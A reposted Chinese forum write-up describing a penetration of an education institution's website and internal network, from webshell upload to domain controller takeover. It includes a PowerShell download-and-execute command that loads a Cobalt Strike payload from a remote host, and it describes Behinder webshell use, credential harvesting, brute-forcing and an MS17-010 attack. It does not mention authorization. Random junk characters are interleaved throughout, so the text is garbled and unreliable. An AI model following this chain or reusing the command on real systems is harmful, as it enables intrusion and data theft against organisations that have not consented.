|
6 ]& f+ ]9 `; V( e0 @ 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
$ Y! f2 W* s% @1 U/ ]/ e3 d0 x. w
& x* L" m F. J D+ I1 `- d" ~3 h6 X; ^8 W" r; q7 A' H
# Y0 A5 r$ g: E
4 j- h+ O8 {( D: g! B1 F* ?
; x6 }# G& a3 M+ v/ x) R 正文4 K( D' L U) c: K' n- n0 m! o7 X
# K$ C. Y! U% `8 E! E
7 k2 a) A* o6 c! M/ E5 |
) Y& H& n5 p& ^ _' U
( @9 c" U( ]; _- d! h
5 i4 T, f, P2 B 目标:www.xxxx.com(一家教育机构)
# I2 G* @, z. M4 e1 H2 ]* ^打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
+ S5 Q$ w; c9 ]/ \" ~ b+ {4 z3 t% K5 M( O
3 p F8 V0 I; ^, T; k7 ` 
5 M9 v* I# C: B& F7 }1 I) U
7 ?1 \) l8 I+ s g* R9 i4 K/ O2 f; d4 {9 W8 Q
进行了简单的信息搜集
3 u# F! p% X j0 [8 K% U& N
( Z: K1 |0 N' X) }1 ^2 s5 t2 P4 z
: o+ C& ~4 U3 W# |% F: m! Y
4 V: U0 `& i2 [8 U+ l8 A5 q' |) p- G# |" Z8 M% a+ a6 t
子域名搜集
^; w' {7 P2 i, ^
0 t1 d4 Q* X4 C! y; n4 F5 ^+ F' n- b7 [
 7 a7 @$ {6 a9 T7 U/ j. X
0 K3 r$ \8 J3 L" E
6 {9 o, d0 x. T4 f, X, A fofa找资产
C* C( W0 x8 g' x
% H& F- h& o, _$ T9 @% A+ Y$ g
* q& G# _% k; ~' ? 6 E# W# i; l# A K+ \7 p) _
3 O% G8 A: U; u% E8 d 
* q, F! X- L- M# b3 H 4 I4 V5 ?+ {. T" Z; p
! S6 v+ K5 @) k4 p( p
一共七个资产。去重之后只有两个。
+ t) H+ ]/ f+ ~9 }! Z% m
[0 A$ W# c0 I6 `/ z q% L1 e* D/ D
7 J. j5 g* H9 R5 f
4 x. g, B$ R5 q1 n. f, U* g2 r5 E 目录探测
- V2 [6 h& P, n, R ; ^( a$ i. Q$ c$ x7 @) @
3 o7 S' v3 Q2 m; n8 m  4 H) v5 N2 d9 t0 {$ O5 t
- X" V+ _% |5 R& D
& Q2 u$ l* O+ B/ t$ o 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
* v F6 O" S+ A3 C' K" Z2 O
! S$ `2 K0 k l; u& H
g7 z8 b% [0 W. @1 T; q 0 k# l& y' v. Z) y
9 q9 z8 H9 ]2 b3 `
我又尝试了通过修改返回包来绕过登录界面' M* j4 v7 d$ |- U; p1 e& ^& V7 a
- E9 Y# J, W! l
1 |/ ?3 Y' U$ R. Q1 S: W& B 
0 I# L+ t2 S! c4 [ `! m1 k
/ _0 V2 n# P- e, z8 c) y+ z( `6 N. |1 n" H8 O
还是不行,尝试注入无果! x, P% y7 n- }, T4 Y3 u& ^
. c1 v* I( O! k* M- K" r) U Z- v* [
 6 X. p7 ~- c3 }, s3 }
N) W- N0 a% p0 h3 ` P8 A. l
5 x5 x0 V% P$ l! m 不过我目录探测出了一处Spring信息泄露
3 x+ G" h6 n$ o( [, T" D
& `( }3 a1 q( I8 K
E: g: N* F/ A/ A* S+ e( \! @
% T/ w9 _2 P6 t; j. i( ~, e& P! F, F+ A, z
 ' M0 n0 P$ M& L4 D+ v% M# _& m# T _
* P! W4 m% y d* B6 c
v& A) ]8 P8 b9 G2 g 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录, V$ K/ o# X0 \ n
2 b" S- t v% l8 [: \
, L" n* O/ F5 ?; D
" [; }- O u. |- q' ` ( g5 ~( J) e8 v3 @) `2 Q. W. N1 ]6 x
/ s& H: s ?* [# B4 P) u/ d; e 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
7 n* a( V& B( W; N9 f& j 4 V0 V3 D! d% R x# e
1 Y/ m- l* y: N' |( A
! Z% m. B7 i8 s1 \
' r+ m" ~. F- N& i/ v5 W
* l4 _8 m& D+ s" E( K, L; u3 [7 R 获取有些师傅到这一步就手机抓包电脑测了。5 t# h0 L* V1 C: S3 y
# o8 B# Z% E; w4 T2 Z9 {2 Y
4 X1 ?8 |8 J# N O3 N
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
& J2 P; T- Z% b' A1 y / j+ t/ c& w; U0 ^ o% [
' e8 K; S$ ^4 M# e 其中在一个公众号发现了小程序,可以进行注册。: {, O. }& A; J0 k) ]
/ T$ w7 _! u5 i; P2 X! `' c% O$ v- |
% g* l+ C ] q5 c: z M% `% S 看到了头像上传,尝试上传获取WebShell% W# Z) p( e) y( |% K
+ l. z$ ^" G4 w8 ?6 w0 g0 q0 T' s; Z3 A$ S8 ]
 ) R$ E H* K" g/ W" M
8 G$ `+ P# n- U
/ ^, f5 h& b" ^/ I3 e1 \" _% ^ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
3 M1 o% Y3 O4 q9 g
/ X* h2 E# E1 {
$ W% F; p4 C% v5 `* R! V 
; W" [* g* S$ ]8 z : ^/ P$ w" M& E/ o @
L* n; ^4 |$ [& t
然后上了大马
/ {$ G+ V- o; L5 R R& } 8 m. w+ o5 c( \( L
3 E$ S8 O& r8 ]8 K, X% [5 F
- @$ _" o1 U2 l/ Z$ E0 @% Z# p0 V " [1 H. M7 y3 @! V; o
+ z8 S+ Q0 T0 w: v9 k 
5 b( A9 Y' T. a) z
( u5 X2 M9 y; ?* M5 K$ B" {, n$ e( q# ~
通过翻找文件发现数据库账号密码+ l. |0 Q' b4 y, K9 A
4 d% h0 {" m7 P' \1 I
1 M" v+ ?1 a+ M: j 
: Y9 \9 A% {0 t. _, K' e 2 I5 G5 n9 ~! G# K& ~, r& `6 d4 B! S. j
+ l/ |7 a5 }7 j7 J7 j% p
--内网渗透
( S3 p% ]) K8 a a @
/ U$ l4 e4 Y7 R
; X1 t* c, |" k, s& _, z z 直接通过powershell执行 cs上线# [& T: X6 C: c" T* b7 ^
! g3 ?$ B8 V% C4 o0 C' i, ?1 P0 A& s5 R2 J7 E" X3 }6 V( V
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
# C$ H1 k* }4 x4 W
2 w6 n/ h. e) |* h9 z- [; L
. i7 y) ?& h$ F4 {  $ i" `. C+ M: n" ?
0 R* X. W: A! e* o, S; w7 e
, R7 N/ g/ T# D) U0 s) D, H/ b: k 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
4 M4 d& H1 I) ] 7 h; M- o0 V- X0 z& y: s+ n
5 _* L0 K" G$ R; m R% e 
|: z/ L+ U% q$ z
1 o9 k6 J: M8 r# Q* ^2 T! P7 W% H# t+ L$ T1 ^; I# }9 u# N3 S
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
# c. _1 r I- M7 ]* ? ~2 R3 ~" s
3 a T. ~. t4 n7 U4 d: E' o
, d! z% ]. J# Z% ]7 i; N: G9 f5 Y
j7 e/ {! _; ~% c7 v( E" K
+ i. X0 | J! M. p6 Y3 ~! Q$ o
4 U% y# X$ j- f6 ~( l- g  7 Q& Z; w9 Z$ ?: g# K
- k# E! t; N3 i. Q8 K. P" w
j, U9 B# F$ ^. r
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
/ Y( J; R6 W) @3 m6 p/ y. |7 }
; N+ m0 P' X; s" z8 ~3 s5 D4 b+ Z
8 k4 ~- i* k; U P4 k; B
- F& n; m5 {+ F9 _! f" ]
7 P8 z- G% a2 @) r& t
 ; H) @5 G7 P$ k4 Q. h
1 Q) R* }5 d( l5 z' S0 b6 q8 |4 l
- {( e/ W9 S0 D# Q# W, S0 m
1 A; _- w1 q9 s0 K' N g/ Z
* w0 Z( X! c9 q$ a* W
/ j G$ e: i% }# E
3 Z& @) d! D& l# a . q' m: b) K* s3 i+ G+ g! n2 t
( h I0 Z" \. y9 H
/ x) J0 Z! [% u- E 小结% W; i3 u& N6 z7 P
: d( u! u& i( n2 O d$ R3 P5 w$ E# a) N. ]( ]+ h
6 L. g; h- y/ K0 K# M
5 ]0 U& X2 T9 \: M: I0 N
* E! e' B* K& t2 Q) } \: C 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
, o) }8 I: x5 b: m
& i; y- C: p4 e5 \ H- c
5 R) q% [( d/ V. G" A+ D0 i) V
. {; L- l9 s/ c" R) H2 ]' m 1 S% d: n$ L6 U7 G
* D( z2 D) f% c4 i1 K! K - 0 v$ Y7 _5 s* c9 u- L, g/ R
6 g6 a1 L3 M t
/ b0 ~+ k# D3 ]
-
1 d! h8 b3 I7 m7 w/ F$ ?
. t( u; e" l+ Q m9 v
% `# k- W# ]/ M) @$ o) x& X % V- `# j, M1 n" B% t2 P1 N
- y# S4 G7 R9 b8 P* n# r" w
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html, B( b7 z5 V4 X/ e5 [& C. }
* v2 f9 y# h& B* l& H8 P1 |& r( Q% R$ W; z4 C, P
% ^$ w6 c W9 J) J2 {7 e' l4 b
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对